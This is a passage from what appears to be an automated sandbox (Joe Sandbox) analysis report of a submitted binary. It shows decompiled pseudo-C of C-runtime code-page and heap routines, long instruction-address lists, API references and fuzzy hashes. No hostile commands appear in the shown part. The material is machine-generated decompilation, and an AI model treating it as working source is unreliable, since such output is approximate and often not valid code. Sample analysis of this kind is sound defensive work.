                                                                                                                                                                                                                                                                      						_t83 = _t83 + 2;
                                                                                                                                                                                                                                                                      						_t95 = _t95 - 1;
                                                                                                                                                                                                                                                                      						__eflags = _t95;
                                                                                                                                                                                                                                                                      					} while (_t95 != 0);
                                                                                                                                                                                                                                                                      					goto L36;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					E0118B1C0(_t98);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				L39:
                                                                                                                                                                                                                                                                      				return E0118DC5F(_v8 ^ _t99);
                                                                                                                                                                                                                                                                      			}






























                                                                                                                                                                                                                                                                      0x0118b582
                                                                                                                                                                                                                                                                      0x0118b589
                                                                                                                                                                                                                                                                      0x0118b591
                                                                                                                                                                                                                                                                      0x0118b599
                                                                                                                                                                                                                                                                      0x0118b59e
                                                                                                                                                                                                                                                                      0x0118b5af
                                                                                                                                                                                                                                                                      0x0118b5af
                                                                                                                                                                                                                                                                      0x0118b5b1
                                                                                                                                                                                                                                                                      0x0118b5b3
                                                                                                                                                                                                                                                                      0x0118b5b5
                                                                                                                                                                                                                                                                      0x0118b5b8
                                                                                                                                                                                                                                                                      0x0118b5b8
                                                                                                                                                                                                                                                                      0x0118b5be
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b5c4
                                                                                                                                                                                                                                                                      0x0118b5c5
                                                                                                                                                                                                                                                                      0x0118b5c8
                                                                                                                                                                                                                                                                      0x0118b5cb
                                                                                                                                                                                                                                                                      0x0118b5d0
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b5d2
                                                                                                                                                                                                                                                                      0x0118b5d2
                                                                                                                                                                                                                                                                      0x0118b5d8
                                                                                                                                                                                                                                                                      0x0118b6a6
                                                                                                                                                                                                                                                                      0x0118b5de
                                                                                                                                                                                                                                                                      0x0118b5de
                                                                                                                                                                                                                                                                      0x0118b5e4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b5ea
                                                                                                                                                                                                                                                                      0x0118b5ee
                                                                                                                                                                                                                                                                      0x0118b5f4
                                                                                                                                                                                                                                                                      0x0118b5f6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b5fc
                                                                                                                                                                                                                                                                      0x0118b601
                                                                                                                                                                                                                                                                      0x0118b607
                                                                                                                                                                                                                                                                      0x0118b609
                                                                                                                                                                                                                                                                      0x0118b693
                                                                                                                                                                                                                                                                      0x0118b699
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b69b
                                                                                                                                                                                                                                                                      0x0118b69c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b69c
                                                                                                                                                                                                                                                                      0x0118b60f
                                                                                                                                                                                                                                                                      0x0118b619
                                                                                                                                                                                                                                                                      0x0118b61e
                                                                                                                                                                                                                                                                      0x0118b626
                                                                                                                                                                                                                                                                      0x0118b62c
                                                                                                                                                                                                                                                                      0x0118b62d
                                                                                                                                                                                                                                                                      0x0118b630
                                                                                                                                                                                                                                                                      0x0118b683
                                                                                                                                                                                                                                                                      0x0118b632
                                                                                                                                                                                                                                                                      0x0118b632
                                                                                                                                                                                                                                                                      0x0118b636
                                                                                                                                                                                                                                                                      0x0118b639
                                                                                                                                                                                                                                                                      0x0118b63b
                                                                                                                                                                                                                                                                      0x0118b63b
                                                                                                                                                                                                                                                                      0x0118b63e
                                                                                                                                                                                                                                                                      0x0118b640
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b642
                                                                                                                                                                                                                                                                      0x0118b645
                                                                                                                                                                                                                                                                      0x0118b650
                                                                                                                                                                                                                                                                      0x0118b650
                                                                                                                                                                                                                                                                      0x0118b652
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b64a
                                                                                                                                                                                                                                                                      0x0118b64f
                                                                                                                                                                                                                                                                      0x0118b64f
                                                                                                                                                                                                                                                                      0x0118b64f
                                                                                                                                                                                                                                                                      0x0118b654
                                                                                                                                                                                                                                                                      0x0118b657
                                                                                                                                                                                                                                                                      0x0118b65a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b65a
                                                                                                                                                                                                                                                                      0x0118b63b
                                                                                                                                                                                                                                                                      0x0118b65c
                                                                                                                                                                                                                                                                      0x0118b65c
                                                                                                                                                                                                                                                                      0x0118b65f
                                                                                                                                                                                                                                                                      0x0118b664
                                                                                                                                                                                                                                                                      0x0118b664
                                                                                                                                                                                                                                                                      0x0118b667
                                                                                                                                                                                                                                                                      0x0118b668
                                                                                                                                                                                                                                                                      0x0118b668
                                                                                                                                                                                                                                                                      0x0118b668
                                                                                                                                                                                                                                                                      0x0118b678
                                                                                                                                                                                                                                                                      0x0118b67e
                                                                                                                                                                                                                                                                      0x0118b67e
                                                                                                                                                                                                                                                                      0x0118b688
                                                                                                                                                                                                                                                                      0x0118b68b
                                                                                                                                                                                                                                                                      0x0118b68c
                                                                                                                                                                                                                                                                      0x0118b68d
                                                                                                                                                                                                                                                                      0x0118b751
                                                                                                                                                                                                                                                                      0x0118b752
                                                                                                                                                                                                                                                                      0x0118b757
                                                                                                                                                                                                                                                                      0x0118b758
                                                                                                                                                                                                                                                                      0x0118b758
                                                                                                                                                                                                                                                                      0x0118b609
                                                                                                                                                                                                                                                                      0x0118b5f6
                                                                                                                                                                                                                                                                      0x0118b5e4
                                                                                                                                                                                                                                                                      0x0118b5d8
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b75a
                                                                                                                                                                                                                                                                      0x0118b6b8
                                                                                                                                                                                                                                                                      0x0118b6c0
                                                                                                                                                                                                                                                                      0x0118b6c0
                                                                                                                                                                                                                                                                      0x0118b6c4
                                                                                                                                                                                                                                                                      0x0118b6c7
                                                                                                                                                                                                                                                                      0x0118b6cd
                                                                                                                                                                                                                                                                      0x0118b6d0
                                                                                                                                                                                                                                                                      0x0118b6d0
                                                                                                                                                                                                                                                                      0x0118b6d3
                                                                                                                                                                                                                                                                      0x0118b6d5
                                                                                                                                                                                                                                                                      0x0118b6d7
                                                                                                                                                                                                                                                                      0x0118b6d7
                                                                                                                                                                                                                                                                      0x0118b6da
                                                                                                                                                                                                                                                                      0x0118b6dc
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b6de
                                                                                                                                                                                                                                                                      0x0118b6e1
                                                                                                                                                                                                                                                                      0x0118b6fd
                                                                                                                                                                                                                                                                      0x0118b6fd
                                                                                                                                                                                                                                                                      0x0118b6ff
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b6e6
                                                                                                                                                                                                                                                                      0x0118b6ec
                                                                                                                                                                                                                                                                      0x0118b6ee
                                                                                                                                                                                                                                                                      0x0118b6f4
                                                                                                                                                                                                                                                                      0x0118b6f8
                                                                                                                                                                                                                                                                      0x0118b6f8
                                                                                                                                                                                                                                                                      0x0118b6f9
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b6f9
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b6ec
                                                                                                                                                                                                                                                                      0x0118b701
                                                                                                                                                                                                                                                                      0x0118b704
                                                                                                                                                                                                                                                                      0x0118b707
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b707
                                                                                                                                                                                                                                                                      0x0118b709
                                                                                                                                                                                                                                                                      0x0118b709
                                                                                                                                                                                                                                                                      0x0118b70c
                                                                                                                                                                                                                                                                      0x0118b70d
                                                                                                                                                                                                                                                                      0x0118b710
                                                                                                                                                                                                                                                                      0x0118b713
                                                                                                                                                                                                                                                                      0x0118b713
                                                                                                                                                                                                                                                                      0x0118b719
                                                                                                                                                                                                                                                                      0x0118b71c
                                                                                                                                                                                                                                                                      0x0118b72b
                                                                                                                                                                                                                                                                      0x0118b734
                                                                                                                                                                                                                                                                      0x0118b739
                                                                                                                                                                                                                                                                      0x0118b73f
                                                                                                                                                                                                                                                                      0x0118b740
                                                                                                                                                                                                                                                                      0x0118b740
                                                                                                                                                                                                                                                                      0x0118b743
                                                                                                                                                                                                                                                                      0x0118b746
                                                                                                                                                                                                                                                                      0x0118b749
                                                                                                                                                                                                                                                                      0x0118b74c
                                                                                                                                                                                                                                                                      0x0118b74c
                                                                                                                                                                                                                                                                      0x0118b74c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b5a0
                                                                                                                                                                                                                                                                      0x0118b5a1
                                                                                                                                                                                                                                                                      0x0118b5a7
                                                                                                                                                                                                                                                                      0x0118b75b
                                                                                                                                                                                                                                                                      0x0118b76a

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 0118B14D: GetOEMCP.KERNEL32(00000000), ref: 0118B178
                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0118B41B,?,00000000), ref: 0118B5EE
                                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,0118B41B,?,?,?,0118B41B,?,00000000), ref: 0118B601
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 546120528-0
                                                                                                                                                                                                                                                                      • Opcode ID: 29b75c73be4c30ac4483a2f8268c8161380ef890cce01d494e02456ee9b3d790
                                                                                                                                                                                                                                                                      • Instruction ID: 148b52001aeb53b6da575181aebe1308e03dc8e1a946bbee0d5c5d0626de8701
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29b75c73be4c30ac4483a2f8268c8161380ef890cce01d494e02456ee9b3d790
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 665176709083468FDB2DEF79C8846BABBE5EF41308F28C06ED0568B191D7359142CF99
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 212 118b3b9-118b3e3 call 1189c30 call 118b4d8 call 118b14d 219 118b3e9-118b3fe call 118bd19 212->219 220 118b3e5-118b3e7 212->220 224 118b42e 219->224 225 118b400-118b416 call 118b57a 219->225 221 118b43c-118b43f 220->221 227 118b430-118b43b call 118a6da 224->227 228 118b41b-118b421 225->228 227->221 230 118b440-118b444 228->230 231 118b423-118b428 call 1189826 228->231 233 118b44b-118b456 230->233 234 118b446 call 1189de4 230->234 231->224 237 118b458-118b462 233->237 238 118b46d-118b487 233->238 234->233 237->238 240 118b464-118b46c call 118a6da 237->240 238->227 241 118b489-118b490 238->241 240->238 241->227 243 118b492-118b4a9 call 118b023 241->243 243->227 247 118b4ab-118b4b5 243->247 247->227
                                                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                                                      			E0118B3B9(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                                                                                      				char _t31;
                                                                                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                                                                                      				char _t40;
                                                                                                                                                                                                                                                                      				intOrPtr _t44;
                                                                                                                                                                                                                                                                      				char _t45;
                                                                                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                                                                                      				void* _t64;
                                                                                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                                                                                      				signed int _t75;
                                                                                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t81 = __eflags;
                                                                                                                                                                                                                                                                      				_v8 = E01189C30(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                                      				E0118B4D8(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                                      				_t31 = E0118B14D(_t81, _a4);
                                                                                                                                                                                                                                                                      				_v16 = _t31;
                                                                                                                                                                                                                                                                      				_t57 =  *(_v8 + 0x48);
                                                                                                                                                                                                                                                                      				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                                                                                      				_t70 = E0118BD19(_t57, 0x220);
                                                                                                                                                                                                                                                                      				_t51 = __ebx | 0xffffffff;
                                                                                                                                                                                                                                                                      				__eflags = _t70;
                                                                                                                                                                                                                                                                      				if(__eflags == 0) {
                                                                                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                                                                                      					_t75 = _t51;
                                                                                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                                                                                                                                                                                                                                      					 *_t70 =  *_t70 & 0x00000000; // executed
                                                                                                                                                                                                                                                                      					_t36 = E0118B57A(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
                                                                                                                                                                                                                                                                      					_t75 = _t36;
                                                                                                                                                                                                                                                                      					__eflags = _t75 - _t51;
                                                                                                                                                                                                                                                                      					if(_t75 != _t51) {
                                                                                                                                                                                                                                                                      						__eflags = _a8;
                                                                                                                                                                                                                                                                      						if(_a8 == 0) {
                                                                                                                                                                                                                                                                      							E01189DE4();
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                                                                      						__eflags = _t51 == 1;
                                                                                                                                                                                                                                                                      						if(_t51 == 1) {
                                                                                                                                                                                                                                                                      							_t45 = _v8;
                                                                                                                                                                                                                                                                      							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x121dae0;
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)(_t45 + 0x48)) != 0x121dae0) {
                                                                                                                                                                                                                                                                      								E0118A6DA( *((intOrPtr*)(_t45 + 0x48)));
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *_t70 = 1;
                                                                                                                                                                                                                                                                      						_t64 = _t70;
                                                                                                                                                                                                                                                                      						_t70 = 0;
                                                                                                                                                                                                                                                                      						 *(_v8 + 0x48) = _t64;
                                                                                                                                                                                                                                                                      						_t40 = _v8;
                                                                                                                                                                                                                                                                      						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                                                                                                                                                                                                                                      						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                      							__eflags =  *0x121dd04 & 0x00000001;
                                                                                                                                                                                                                                                                      							if(( *0x121dd04 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                      								_v16 =  &_v8;
                                                                                                                                                                                                                                                                      								E0118B023(5,  &_v16);
                                                                                                                                                                                                                                                                      								__eflags = _a8;
                                                                                                                                                                                                                                                                      								if(_a8 != 0) {
                                                                                                                                                                                                                                                                      									_t44 =  *0x121dd00; // 0x1362bf0
                                                                                                                                                                                                                                                                      									 *0x121d7cc = _t44;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                                                                                      						E0118A6DA(_t70);
                                                                                                                                                                                                                                                                      						return _t75;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(E01189826())) = 0x16;
                                                                                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}


















                                                                                                                                                                                                                                                                      0x0118b3b9
                                                                                                                                                                                                                                                                      0x0118b3c6
                                                                                                                                                                                                                                                                      0x0118b3c9
                                                                                                                                                                                                                                                                      0x0118b3d1
                                                                                                                                                                                                                                                                      0x0118b3da
                                                                                                                                                                                                                                                                      0x0118b3dd
                                                                                                                                                                                                                                                                      0x0118b3e3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b3e5
                                                                                                                                                                                                                                                                      0x0118b3e9
                                                                                                                                                                                                                                                                      0x0118b3f6
                                                                                                                                                                                                                                                                      0x0118b3f8
                                                                                                                                                                                                                                                                      0x0118b3fc
                                                                                                                                                                                                                                                                      0x0118b3fe
                                                                                                                                                                                                                                                                      0x0118b42e
                                                                                                                                                                                                                                                                      0x0118b42e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b400
                                                                                                                                                                                                                                                                      0x0118b40d
                                                                                                                                                                                                                                                                      0x0118b413
                                                                                                                                                                                                                                                                      0x0118b416
                                                                                                                                                                                                                                                                      0x0118b41b
                                                                                                                                                                                                                                                                      0x0118b41f
                                                                                                                                                                                                                                                                      0x0118b421
                                                                                                                                                                                                                                                                      0x0118b440
                                                                                                                                                                                                                                                                      0x0118b444
                                                                                                                                                                                                                                                                      0x0118b446
                                                                                                                                                                                                                                                                      0x0118b446
                                                                                                                                                                                                                                                                      0x0118b451
                                                                                                                                                                                                                                                                      0x0118b455
                                                                                                                                                                                                                                                                      0x0118b456
                                                                                                                                                                                                                                                                      0x0118b458
                                                                                                                                                                                                                                                                      0x0118b45b
                                                                                                                                                                                                                                                                      0x0118b462
                                                                                                                                                                                                                                                                      0x0118b467
                                                                                                                                                                                                                                                                      0x0118b46c
                                                                                                                                                                                                                                                                      0x0118b462
                                                                                                                                                                                                                                                                      0x0118b46d
                                                                                                                                                                                                                                                                      0x0118b473
                                                                                                                                                                                                                                                                      0x0118b478
                                                                                                                                                                                                                                                                      0x0118b47a
                                                                                                                                                                                                                                                                      0x0118b47d
                                                                                                                                                                                                                                                                      0x0118b480
                                                                                                                                                                                                                                                                      0x0118b487
                                                                                                                                                                                                                                                                      0x0118b489
                                                                                                                                                                                                                                                                      0x0118b490
                                                                                                                                                                                                                                                                      0x0118b495
                                                                                                                                                                                                                                                                      0x0118b49e
                                                                                                                                                                                                                                                                      0x0118b4a3
                                                                                                                                                                                                                                                                      0x0118b4a9
                                                                                                                                                                                                                                                                      0x0118b4ab
                                                                                                                                                                                                                                                                      0x0118b4b0
                                                                                                                                                                                                                                                                      0x0118b4b0
                                                                                                                                                                                                                                                                      0x0118b4a9
                                                                                                                                                                                                                                                                      0x0118b490
                                                                                                                                                                                                                                                                      0x0118b430
                                                                                                                                                                                                                                                                      0x0118b431
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b423
                                                                                                                                                                                                                                                                      0x0118b428
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118b428
                                                                                                                                                                                                                                                                      0x0118b421

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 01189C30: GetLastError.KERNEL32(?,?,01185EB1,?,?,?,01184B88,?), ref: 01189C34
                                                                                                                                                                                                                                                                        • Part of subcall function 01189C30: _free.LIBCMT ref: 01189C67
                                                                                                                                                                                                                                                                        • Part of subcall function 01189C30: SetLastError.KERNEL32(00000000,?), ref: 01189CA8
                                                                                                                                                                                                                                                                        • Part of subcall function 01189C30: _abort.LIBCMT ref: 01189CAE
                                                                                                                                                                                                                                                                        • Part of subcall function 0118B4D8: _abort.LIBCMT ref: 0118B50A
                                                                                                                                                                                                                                                                        • Part of subcall function 0118B4D8: _free.LIBCMT ref: 0118B53E
                                                                                                                                                                                                                                                                        • Part of subcall function 0118B14D: GetOEMCP.KERNEL32(00000000), ref: 0118B178
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118B431
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118B467
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2991157371-0
                                                                                                                                                                                                                                                                      • Opcode ID: 5203448594bd79ba3e76a944873902939d86625d9978945540301d07ce09f85d
                                                                                                                                                                                                                                                                      • Instruction ID: b360e92e6431574e38c8189126cfa4e987d159bfcab01f6b6d2f33a3f767240a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5203448594bd79ba3e76a944873902939d86625d9978945540301d07ce09f85d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F31D331908209EFDB19FBACE445B6D7BE4EF50328F25819AE4059B2A2DB325D41CF54
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 271 1191d69-1191d76 call 118a67d 273 1191d7b-1191d86 271->273 274 1191d88-1191d8a 273->274 275 1191d8c-1191d94 273->275 276 1191dd4-1191de2 call 118a6da 274->276 275->276 277 1191d96-1191d9a 275->277 278 1191d9c-1191dce call 118a986 277->278 283 1191dd0-1191dd3 278->283 283->276
                                                                                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                                                                                      			E01191D69(void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				void* __ecx;
                                                                                                                                                                                                                                                                      				char _t16;
                                                                                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                                                                                      				char _t31;
                                                                                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                                                                                      				intOrPtr* _t35;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_push(_t26);
                                                                                                                                                                                                                                                                      				_push(_t26);
                                                                                                                                                                                                                                                                      				_t16 = E0118A67D(_t26, 0x40, 0x30); // executed
                                                                                                                                                                                                                                                                      				_t31 = _t16;
                                                                                                                                                                                                                                                                      				_v12 = _t31;
                                                                                                                                                                                                                                                                      				_t28 = _t30;
                                                                                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                                                                                      					_t2 = _t31 + 0xc00; // 0xc00
                                                                                                                                                                                                                                                                      					_t17 = _t2;
                                                                                                                                                                                                                                                                      					__eflags = _t31 - _t17;
                                                                                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                                                                                      						_t3 = _t31 + 0x20; // 0x20
                                                                                                                                                                                                                                                                      						_t35 = _t3;
                                                                                                                                                                                                                                                                      						_t33 = _t17;
                                                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                                                      							_t4 = _t35 - 0x20; // 0x0
                                                                                                                                                                                                                                                                      							E0118A986(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                                                                                                                                                                                                                                      							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                                                                                                                                                                                                                                      							 *_t35 = 0;
                                                                                                                                                                                                                                                                      							_t35 = _t35 + 0x30;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                                                                                                                                                                                                                                      							 *((char*)(_t35 - 0x24)) = 0xa;
                                                                                                                                                                                                                                                                      							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                                                                                                                                                                                                                                      							 *((char*)(_t35 - 0x22)) = 0;
                                                                                                                                                                                                                                                                      							__eflags = _t35 - 0x20 - _t33;
                                                                                                                                                                                                                                                                      						} while (__eflags != 0);
                                                                                                                                                                                                                                                                      						_t31 = _v12;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t31 = 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E0118A6DA(0);
                                                                                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                                                                                      			}













                                                                                                                                                                                                                                                                      0x01191d6e
                                                                                                                                                                                                                                                                      0x01191d6f
                                                                                                                                                                                                                                                                      0x01191d76
                                                                                                                                                                                                                                                                      0x01191d7b
                                                                                                                                                                                                                                                                      0x01191d7f
                                                                                                                                                                                                                                                                      0x01191d83
                                                                                                                                                                                                                                                                      0x01191d86
                                                                                                                                                                                                                                                                      0x01191d8c
                                                                                                                                                                                                                                                                      0x01191d8c
                                                                                                                                                                                                                                                                      0x01191d92
                                                                                                                                                                                                                                                                      0x01191d94
                                                                                                                                                                                                                                                                      0x01191d97
                                                                                                                                                                                                                                                                      0x01191d97
                                                                                                                                                                                                                                                                      0x01191d9a
                                                                                                                                                                                                                                                                      0x01191d9c
                                                                                                                                                                                                                                                                      0x01191da2
                                                                                                                                                                                                                                                                      0x01191da6
                                                                                                                                                                                                                                                                      0x01191dab
                                                                                                                                                                                                                                                                      0x01191daf
                                                                                                                                                                                                                                                                      0x01191db1
                                                                                                                                                                                                                                                                      0x01191db4
                                                                                                                                                                                                                                                                      0x01191dba
                                                                                                                                                                                                                                                                      0x01191dc1
                                                                                                                                                                                                                                                                      0x01191dc5
                                                                                                                                                                                                                                                                      0x01191dc9
                                                                                                                                                                                                                                                                      0x01191dcc
                                                                                                                                                                                                                                                                      0x01191dcc
                                                                                                                                                                                                                                                                      0x01191dd0
                                                                                                                                                                                                                                                                      0x01191dd3
                                                                                                                                                                                                                                                                      0x01191d88
                                                                                                                                                                                                                                                                      0x01191d88
                                                                                                                                                                                                                                                                      0x01191d88
                                                                                                                                                                                                                                                                      0x01191dd5
                                                                                                                                                                                                                                                                      0x01191de2

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A67D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01189C5E,00000001,00000364,?,01184B88,?), ref: 0118A6BE
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01191DD5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
